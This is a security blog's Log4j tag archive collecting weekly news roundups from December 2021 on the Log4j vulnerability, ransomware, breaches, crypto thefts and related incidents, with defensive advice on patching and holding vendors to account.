Tag Archives: Log4j

Security News for the Week Ending December 31, 2021

W. Va. Hospital Breach Timeline – Way Too Long

The Monongalia Health System was attacked recently and hackers had access to several email accounts, apparently belonging to contractors from May 10 to August 15 or about three months. It took them another 60 days to investigate. They are just not telling us about the breach – more than 7 months after it started. They only figured out that they were hacked because a vendor said that they were not paid (a standard business email compromise attack). They will, no doubt, get whacked by the feds, but this is a lesson to everyone that your vendors are your risk too. Credit: ZDNet

Java Code Repo Riddled with Hidden Log4j Bugs

Remember that you should assume that any code that you download from the net is full of bugs and security holes. If you assume that, and you are lucky, then that is good, if you assume the reverse and you are not lucky, well, not so good. Threatpost is reporting that there are 17,000 unpatched Log4j packages in the Maven Central ecosystem. Many of those will never be patched. CAVEAT EMPTOR

Fallout from Kronos Ransomware Attack – Some Employees Not Receiving Full Pay

Kronos, the international HR firm suffered a ransomware attack several weeks ago. Some employees at appliance maker Electrolux are saying that they are still not receiving their full wages or in some cases, not getting paid at all. In most states the law is pretty specific about paying employees, so if you don’t want to be on the wrong end of an investigation, create a disaster recovery plan. Credit Cyber News

North Korean Hackers Stole $1.7 Billion as an Investment

North Korea considers cryptocurrency a long term investment. As a result, when they steal billions in crypto, instead of selling it, they save it. Maybe that is not a bad strategy. Bitcoin, for example, was worth $313 in 2015, $997 in 2017, $3869 in 2019 and $46,847 right now. So if you stole 1 coin in 2015, your “investment returned 150x today; that is, your $313 crime is worth $46,847. Maybe the North Koreans are onto something. Credit: Dailycoin

Oops, The Dog Ate 77 TB of Our Backups

Well, not exactly, but something ate the backups. Kyoto University in Japan lost 77 terabytes of data when a backup process went wild on their HP supercomputer. The event happened in mid-December when 34 million files were wiped from the system and the backups. The University determined that some of the data cannot be restored. The University has not said how this happened or what the impact of this failed backup process is. Credit: Bleeping Computer

Security News for the Week Ending December 17, 2021

The Gift That Keeps on Giving – Log4j – List of Affected Vendors

First, get used to hearing about this. It will be haunting us for months, at least. Jen Easterly, current head of DHS’s CISA and formerly at NSA and a professor at the US Military Academy at West Point says this may be THE WORST vulnerability she has seen in her career. As of Monday, here is a list of affected vendors. If you use any of these vendors, and it looks like a who’s who of computer software, watch for patches. Second, it looks like the first patch for Log4j, 2.15, didn’t close the hole and now there is a new release, 2.16. This will keep evolving, so if you are a company that uses software, this applies to you.

From Friday through Tuesday researchers tracked more than 840,000 attempted attacks looking for the Log4J vulnerability. They are only getting started. Credit: Ars Technica

Hackers Hit Third Cryptocurrency Company This Month-Total Haul is Over $400 Mil

Vulcan Forge is the next cryptocurrency company to get hit by hackers. They stole about $135 million from them. If you get the sense that cryptocurrency software is buggy and processes are weak, you have it about right. In VulcanForge’s case, since it is decentralized, there is no central authority to block the movement of stolen currency. This is not going to end anytime soon. Credit: Vice

Apple Airtags Make a Wonderful Stalking Tool

Stalkers are using Apple Airtags to stalk people. A woman in Arkansas, for example, got into her car and her iPhone told her that an airtag was following her. She found the tag on her trunk. If a stalker tried to hide it, say under her car somewhere, it would be more difficult to find. Apple says that Android users can detect a rogue Airtag because it will beep if it is separated from its owner for more than three days (assuming that is the case).

Credit: Apple Insider and Daily Kos. Apple has released an Android app to detect rogue trackers, but how many Android users are going to even think of downloading an Apple app. Credit: PC Mag

Feds Don’t Quite Handle Incident Response

A backdoor in the network of the United States Commission on International Religious Freedom has allowed attackers to intercept, and likely exfiltrate, all local network traffic on the agency’s systems. Security firm Avast discovered the intrusion in May, spoke the agency’s executive director and even talked to CISA. After getting no follow-up for months, Avast published their findings. Avast says that due to lack of communications from the Agency, they don’t know if they fixed the problem. They have since reached out to other agencies and NGOs focused on international rights to warn them. Maybe they fixed the problem right away? Who knows? Credit: Data Breach Today

Log4j Vulnerability Impact Grows

Log4j is a very popular server logging package used across the Internet on Linux servers and other devices. This package is used not only in corporate software development environments, but also by very well known companies like Apple. It is also used in IoT devices and other appliances.

DHS’s CISA has created a web page with guidance, here and has also put out an alert, here.

Unfortunately, due to the current state of the software industry, users will have difficulty knowing whether any software that they are running or that they are using that is running in the cloud is impacted.

If vendors were required to provide a software “bill of materials”, something which is being mandated for software used by the federal government as a result of the President’s Cybersecurity EO, then consumers like you and me would have a chance at knowing what software is impacted.

For those with a strong IT department, some vendors have released detection tools for businesses to figure out if they are running software that is vulnerable. (for example, here is Datto’s announcement, but you have to be running their management software).

CISA created a “must patch” list for executive branch agencies a month or two ago. This list includes bugs that agencies must patch and this bug was added to the list, along with 12 others.

SC Magazine says that the cleanup from this will take months, at least. Some companies will not be responsible and will not spend the time to clean up their part of the mess (i.e., patch their vulnerable software). If they don’t tell us that their software is vulnerable – and legally they are not required to – then we will continue to use it, not understanding that our systems and our data is at risk.

If this bug is exploited, and it can be exploited remotely, all data on the impacted system is at risk!

It is also important to understand that hackers, who are ALREADY exploiting this bug, will add back doors into infected systems so that even after the bug is patched, the hackers will remain inside many networks, lurking undetected.

There are many cases of hackers remaining inside corporate networks, undetected, for years.

Given that there are 3 billion or so devices running Java, some percentage of those need to log and this is the go to package. Many of those devices will never be patched and always be a hole into your network.

Among vendors that we think are impacted are Amazon’s AWS, Broadcom, Cisco, Connectwise, Fortinet, HCL, IBM, N-Able, Okta, VMWare and likely hundreds of others. Not all products from these vendors are affected.

Businesses need to hold their vendors accountable. Unless you are a big company with clout you probably can’t force your vendors to be accountable, but if you don’t ask, you certainly won’t get information.

Also, all users need to stay current on all patches. Hopefully, most vendors will be responsible and release patches. This is one place that small companies get to benefit from large businesses ability to beat up the same vendors that you use.

Users get to be vigilant. Probably vendors will be releasing patches over the next few months. This one will not be over soon. Vendors may release alerts and workarounds.

If you are running any old, unsupported software, you are basically on your own. Not only will you not get any patches, you probably won’t even know that you are running affected software.

Also remember that if your vendor gets hacked as a result of this bug, you are both responsible and likely legally liable. Just saying.

If you have questions, please contact us.

Security News for the Week Ending December 10, 2021

NEW LOG4J JAVA LIBRARY ZERO-DAY IS BEING EXPLOITED IN THE WILD

A proof of concept for a zero-day vulnerability in the very popular Apache Log4j Java library is being shared online. Log4j is used both in enterprises and in cloud services. Products from Apple, Amazon, Twitter and Steam, among others may be vulnerable to remote code execution exploits. All versions through 2.14.1 are vulnerable CISA and other government agencies have issued alerts. Many Managed Service Providers are finding themselves under attack. Find details at Bleeping Computer and US CERT and Huntress Labs.

Researcher Found Method to Brute Force Verizon PINs

A researcher discovered a bug that allowed him to brute force any customer’s Verizon security PIN. After reporting it to Verizon, Verizon told Vice that they solved the problem by taking down the vulnerable website pages. Hopefully, when those pages return, the bug will be fixed. Credit: Vice

US Military Admits to Offensive Hacking

Cyber Command, AKA the NSA, has confirmed that they have taken unspecified hacking to disrupt hackers ability to hack. This comes from none other than General Paul Nakasone, head of the NSA and CyberCom. While they know that they can’t shut down hackers, they also know that they can make it more costly. Nakasone said that a number of elements of the government (i.e. more than just the NSA) have taken actions and we have imposed costs. Just speculating, but hackers are often not good programmers and even worse at operational security, so it is not at all surprising that they can be hacked. Historically we haven’t done that, but it looks like now we are. Credit: CNN

A Camera the Size of a Grain of Salt

It can take better full color images than a camera 500,000 times its size. It even works in ordinary light. The surface is made from silicon nitride, meaning that it can be made in microchip manufacturing plants. It could be used in medicine (like in an endoscope), but think about the uses by spies. What an incredible spy cam. No one is going to see a grain of salt. Credit: Vice

In the Face of a $150 BILLION Lawsuit, Facebook Bans Myanmar Military

Facebook announced this week that it will remove pages, groups and accounts representing military controlled businesses. Many criticized it as a cynical ploy to deflect criticism coming from the billion dollar lawsuit. The US lawsuit illustrates how Facebook’s algorithms often recommend extremist groups and violent content in exchange for more customers. Credit: ZDNet